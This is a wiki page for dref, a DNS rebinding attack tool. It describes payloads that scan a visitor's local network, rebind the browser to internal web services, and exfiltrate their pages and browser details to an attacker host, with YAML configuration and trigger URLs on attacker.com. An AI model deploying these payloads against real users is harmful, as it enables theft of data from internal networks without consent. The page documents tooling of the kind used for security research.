Skip to content

Payloads

Jump to bottom
alxk edited this page Sep 5, 2018 · 9 revisions

Web Discover

Description

The web-discover payload will fetch the browser's local IP address using WebRTC, and from there derive a /24 subnet.

It will proceed to use netmap.js to scan the subnet for live web services on ports 80 and 8080.

When the scan is complete it will open rebind iFrames for each web service found, configure the DNS records to point to the local services, and then fetch the services' index page.

It will POST the HTML responses back to dref, effectively exfiltrating data across origins.

The payload uses the "slow and safe" rebinding method, as such it will take several minutes to run to completion.

Source

dref/scripts/src/payloads/web-discover.js

Usage

To configure the payload, edit dref-config.yml:

targets:
  - target: "demo"
    script: "web-discover"

The payload can be triggered by visiting http://demo.attacker.com/.

Sysinfo

Description

This payload does not use DNS rebinding. It simply exfiltrates information about the browser that may be of use to an attacker, such as version information, configuration etc.

Source

dref/scripts/src/payloads/sysinfo.js

Usage

To configure the payload, edit dref-config.yml:

targets:
  - target: "sysinfo"
    script: "sysinfo"

The payload can be triggered by visiting http://sysinfo.attacker.com/.

Fast Rebind

Description

The Fast Rebind payload showcases the fastRebind configuration key, which enables near-instant DNS rebinding. This sample payload will simply rebind to the target host and port and exfiltrate the supplied path.

fastRebind does not work all the time, and is inconsistent between browsers/OSs. This attack currently works 50% of the time on Chrome on MacOS (other platforms not tested). The attack can be improved to 100% success rate and this is on the roadmap.

The advantage of fastRebind is that victims need only stay a couple of seconds on the website to run the full attack, instead of the 60 seconds required for the universal, stable, DNS rebinding attack.

Note that fastRebind is set to true in the targets configuration below.

Source

dref/scripts/src/payloads/fast-rebind.js

Usage

To configure the payload, edit dref-config.yml:

targets:
  - target: "fast-rebind"
    script: "fast-rebind"
    fastRebind: true
    args:
      host: "192.168.1.1"
      port: 80
      path: "/index.html"

The payload can be triggered by visiting http://fast-rebind.attacker.com/.

Help

If you encounter any issues with the payloads, come chat on gitter

Home

Setup

Using Payloads

Exfiltrated Data

Built-in Payloads

Building Payloads

Core Development

Clone this wiki locally